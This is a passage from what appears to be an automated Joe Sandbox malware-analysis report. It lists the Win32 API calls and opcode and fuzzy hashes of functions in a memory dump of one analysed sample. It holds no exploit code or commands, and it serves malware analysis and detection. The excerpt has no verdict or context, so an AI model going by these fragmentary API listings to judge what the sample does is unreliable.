                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3852720340-0
                                                                                                      • Opcode ID: 26cf4515b76219651beb070df84416e57a8e4c16bef466f5ea3137a6802a5145
                                                                                                      • Instruction ID: 0d6a1ee0347756bd230f015035cb17d6341449835599a5246710508079da4cd0
                                                                                                      • Opcode Fuzzy Hash: 26cf4515b76219651beb070df84416e57a8e4c16bef466f5ea3137a6802a5145
                                                                                                      • Instruction Fuzzy Hash: 8E01DFF264A3116EAA2427757EC9A2A3F95EB45776F20033AF110852F0EF218D029270
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,00000000,00D34D73,00000000,?,?,00D36902,?,?,00000000), ref: 00D43108
                                                                                                      • _free.LIBCMT ref: 00D4313B
                                                                                                      • _free.LIBCMT ref: 00D43163
                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000), ref: 00D43170
                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000), ref: 00D4317C
                                                                                                      • _abort.LIBCMT ref: 00D43182
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                      • String ID:
                                                                                                      • API String ID: 3160817290-0
                                                                                                      • Opcode ID: 9dc99473ba9bec05255fc28f677deb7034714d816ebd747fb709b9b969214889
                                                                                                      • Instruction ID: f2a889aaaec1f51fca9c490a79257e1b088af0460113a0ea2a5db6c50f2bb208
                                                                                                      • Opcode Fuzzy Hash: 9dc99473ba9bec05255fc28f677deb7034714d816ebd747fb709b9b969214889
                                                                                                      • Instruction Fuzzy Hash: 2FF0F636945B0177DA22733DBC0AE2F326ADFD5770F294925F429E22E1EF64CA024171
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D11ED9: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D11F33
                                                                                                        • Part of subcall function 00D11ED9: SelectObject.GDI32(?,00000000), ref: 00D11F42
                                                                                                        • Part of subcall function 00D11ED9: BeginPath.GDI32(?), ref: 00D11F59
                                                                                                        • Part of subcall function 00D11ED9: SelectObject.GDI32(?,00000000), ref: 00D11F82
                                                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00DA93AD
                                                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00DA93C1
                                                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00DA93CF
                                                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00DA93DF
                                                                                                      • EndPath.GDI32(?), ref: 00DA93EF
                                                                                                      • StrokePath.GDI32(?), ref: 00DA93FF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                      • String ID:
                                                                                                      • API String ID: 43455801-0
                                                                                                      • Opcode ID: 5904357bf4b9eadbacd9793960dc46d1f6b07324790d18567f618d742b3cc899
                                                                                                      • Instruction ID: b2e3cac3c15f4db84bf1f6daf70bb3ddd26109fb6d9fd3f7e85affe3387de29d
                                                                                                      • Opcode Fuzzy Hash: 5904357bf4b9eadbacd9793960dc46d1f6b07324790d18567f618d742b3cc899
                                                                                                      • Instruction Fuzzy Hash: 1E111E7600024CBFDF019F90DC88EAA7F6DEB09350F048011FA06992A1D7719D55DF74
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 00D75AA7
                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D75AB8
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D75ABF
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00D75AC7
                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00D75ADE
                                                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00D75AF0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsDevice$Release
                                                                                                      • String ID:
                                                                                                      • API String ID: 1035833867-0
                                                                                                      • Opcode ID: f701438a5f3bf9809b4318dc3ddbb37575a741062edef496f72410cc5f6de767
                                                                                                      • Instruction ID: 76ba77609265aee89fb5a236598d1b0c870a1f45a3298b9aa67ad40ed5e7251a
                                                                                                      • Opcode Fuzzy Hash: f701438a5f3bf9809b4318dc3ddbb37575a741062edef496f72410cc5f6de767
                                                                                                      • Instruction Fuzzy Hash: CD012175A00719BBEB109BA59C49A8EBF79EB49751F148065FA09E7280D6709801CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D13236
                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D1323E
                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D13249
                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D13254
                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D1325C
                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D13264
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4278518827-0
                                                                                                      • Opcode ID: 949372e64b9ac0eb7b2ef027647d1248dc75ac61e8cb08a979cc3cbee4dfcd1e
                                                                                                      • Instruction ID: e381bbdf36d41794bc8edd4880083be8f7cbe940ab9c685734e449d9a1ed2e1f
                                                                                                      • Opcode Fuzzy Hash: 949372e64b9ac0eb7b2ef027647d1248dc75ac61e8cb08a979cc3cbee4dfcd1e
                                                                                                      • Instruction Fuzzy Hash: 0E016CB09017597DE3008F5A8C85B52FFA8FF19354F04411B915C47A41C7F5A864CBE5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00D7F35C
                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00D7F372
                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00D7F381
                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D7F390
                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D7F39A
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D7F3A1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 839392675-0
                                                                                                      • Opcode ID: 9ab5649fd1b6807e064755920229ba168452fa2b9ba4b4dcec3f9720b6396f3b
                                                                                                      • Instruction ID: 1335c031583c918f2f32e95a8606c212908a2422b77301d4f6309860fc863ba9
                                                                                                      • Opcode Fuzzy Hash: 9ab5649fd1b6807e064755920229ba168452fa2b9ba4b4dcec3f9720b6396f3b
                                                                                                      • Instruction Fuzzy Hash: 83F03A32241358BBE7215B629C0EEEF3B7DEFC7B11F040058F606D1290EBA06A02C6B5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?), ref: 00D534B3
                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00D534CA
                                                                                                      • GetWindowDC.USER32(?), ref: 00D534D6
                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00D534E5
                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00D534F7
                                                                                                      • GetSysColor.USER32(00000005), ref: 00D53511
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 272304278-0
                                                                                                      • Opcode ID: b9412cb4cbfb5f6f7c340a5ee46d63824744ea6d7c9b4e5575e9d00d0602ec4a
                                                                                                      • Instruction ID: 8a64162e1d9a8bf9bcc43ab9191ee0a88d0cfb5c33a7fd0d413ee88ee5343500
                                                                                                      • Opcode Fuzzy Hash: b9412cb4cbfb5f6f7c340a5ee46d63824744ea6d7c9b4e5575e9d00d0602ec4a
                                                                                                      • Instruction Fuzzy Hash: 22014871800209EFDB119F60DC48BEA7BB6FB06311F550164FD16A22A1CB310E95AB31
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D7210F
                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00D7211B
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00D72124
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00D7212C
                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D72135
                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00D7213C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 146765662-0
                                                                                                      • Opcode ID: 47a0959b1e9a42b1df6f492a1e34eba5a138f33f964b9ae738bd46c392b499bf
                                                                                                      • Instruction ID: 769bf1a4472ed388a477cc7ab5bc6534b4a74d6b014eff1798284a93ee233a1d
                                                                                                      • Opcode Fuzzy Hash: 47a0959b1e9a42b1df6f492a1e34eba5a138f33f964b9ae738bd46c392b499bf
                                                                                                      • Instruction Fuzzy Hash: F3E0E576104301BBDB011FA1ED0C94ABF3AFF5A322B104220F226C2A70DB329421DF60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D14154: _wcslen.LIBCMT ref: 00D14159
                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D7CEAE
                                                                                                      • _wcslen.LIBCMT ref: 00D7CEF5
                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D7CF5C
                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00D7CF8A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 1227352736-4108050209
                                                                                                      • Opcode ID: ae728677609af3f44990ec497609cc8062af9ff48925b6669639f9e67704233f
                                                                                                      • Instruction ID: 1612be4c595de41c30a38aed0efe00349dad4fe0906423a4b52e450aa2e0fe84
                                                                                                      • Opcode Fuzzy Hash: ae728677609af3f44990ec497609cc8062af9ff48925b6669639f9e67704233f
                                                                                                      • Instruction Fuzzy Hash: 2F51B3716253005FD714DF28C845B6BBBE9EF85314F08992DF999D6290EB70C9448772
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00D9B802
                                                                                                        • Part of subcall function 00D14154: _wcslen.LIBCMT ref: 00D14159
                                                                                                      • GetProcessId.KERNEL32(00000000), ref: 00D9B897
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D9B8C6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                      • String ID: <$@
                                                                                                      • API String ID: 146682121-1426351568
                                                                                                      • Opcode ID: 52f143e106b246e7ce5514d21611c0072b916093493b8c192a6f7c60babcc342
                                                                                                      • Instruction ID: 6f060b530858fc6e81c55a2bb400ce2cac1a1c4480151f890923b78374b3865c
                                                                                                      • Opcode Fuzzy Hash: 52f143e106b246e7ce5514d21611c0072b916093493b8c192a6f7c60babcc342
                                                                                                      • Instruction Fuzzy Hash: B5713974A00219DFCF14DF94E584A9EBBF5EF08320F05849AE855AB361CB71ED85CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D77A95
                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00D77ACB
                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00D77ADC
                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D77B5E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                      • String ID: DllGetClassObject
                                                                                                      • API String ID: 753597075-1075368562
                                                                                                      • Opcode ID: 06b806fd05e0a36db5341153323c3c72f48aec3947b9afdbcf34253b0dcd9b79
                                                                                                      • Instruction ID: 090865f50cce7e080942f44e5ca1897c38d815cdb39cae9a4f7779531e9deff4
                                                                                                      • Opcode Fuzzy Hash: 06b806fd05e0a36db5341153323c3c72f48aec3947b9afdbcf34253b0dcd9b79
                                                                                                      • Instruction Fuzzy Hash: 3041AE71604308EFDB05CF64C884A9A7BB9EF49314F14C8A9AD09DF246E7B0D944CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DA4794
                                                                                                      • IsMenu.USER32(?), ref: 00DA47A9
                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DA47F1
                                                                                                      • DrawMenuBar.USER32 ref: 00DA4804
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 3076010158-4108050209
                                                                                                      • Opcode ID: 71524451ae425da2e3e3c44c2b1aad309dfaa65bf7019aa257fb64d3076189bf
                                                                                                      • Instruction ID: d6e1a55828c42f8b206ebb8bbea3a74ab1119e2b6dcf34bde0cc43754aae3ad8
                                                                                                      • Opcode Fuzzy Hash: 71524451ae425da2e3e3c44c2b1aad309dfaa65bf7019aa257fb64d3076189bf
                                                                                                      • Instruction Fuzzy Hash: 44414B75A01249EFDB20CF64E884AAA77B9FF86314F084129E94597350D774ED54CFB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                        • Part of subcall function 00D74536: GetClassNameW.USER32(?,?,000000FF), ref: 00D74559
                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00D726F6
                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00D72709
                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00D72739
                                                                                                        • Part of subcall function 00D184B7: _wcslen.LIBCMT ref: 00D184CA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                                                      • String ID: ComboBox$ListBox
                                                                                                      • API String ID: 2081771294-1403004172
                                                                                                      • Opcode ID: 56787b8a2599b93689d378271a745612ffc28c42caae3b73ae69612d3de2fcc6
                                                                                                      • Instruction ID: aa87f77b4ace98946f8e6b1ed0e38ecc750a73f44bed41b59eff37a3daa936ff
                                                                                                      • Opcode Fuzzy Hash: 56787b8a2599b93689d378271a745612ffc28c42caae3b73ae69612d3de2fcc6
                                                                                                      • Instruction Fuzzy Hash: 81210771900144BFDB18ABA0DD46CFFB779DF45764F14811AF466932E1EF38494A9630
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen
                                                                                                      • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                                      • API String ID: 176396367-4004644295
                                                                                                      • Opcode ID: 1e678ffba9123c880d1fbca2b0a6668e95cf2eaa1aa36fa2ac1d1d5c948963ce
                                                                                                      • Instruction ID: 4d16b6a3a34e07567a6dbd620d6ab92178e0f235206186d349e4ae30c00b10b2
                                                                                                      • Opcode Fuzzy Hash: 1e678ffba9123c880d1fbca2b0a6668e95cf2eaa1aa36fa2ac1d1d5c948963ce
                                                                                                      • Instruction Fuzzy Hash: 4C312333A001698BCF209F6CD9501BE33A3AB61750F1D002AEC44AB348EA75DD80C7B1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DA38EC
                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00DA38F3
                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DA3908
                                                                                                      • DestroyWindow.USER32(?), ref: 00DA3910
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
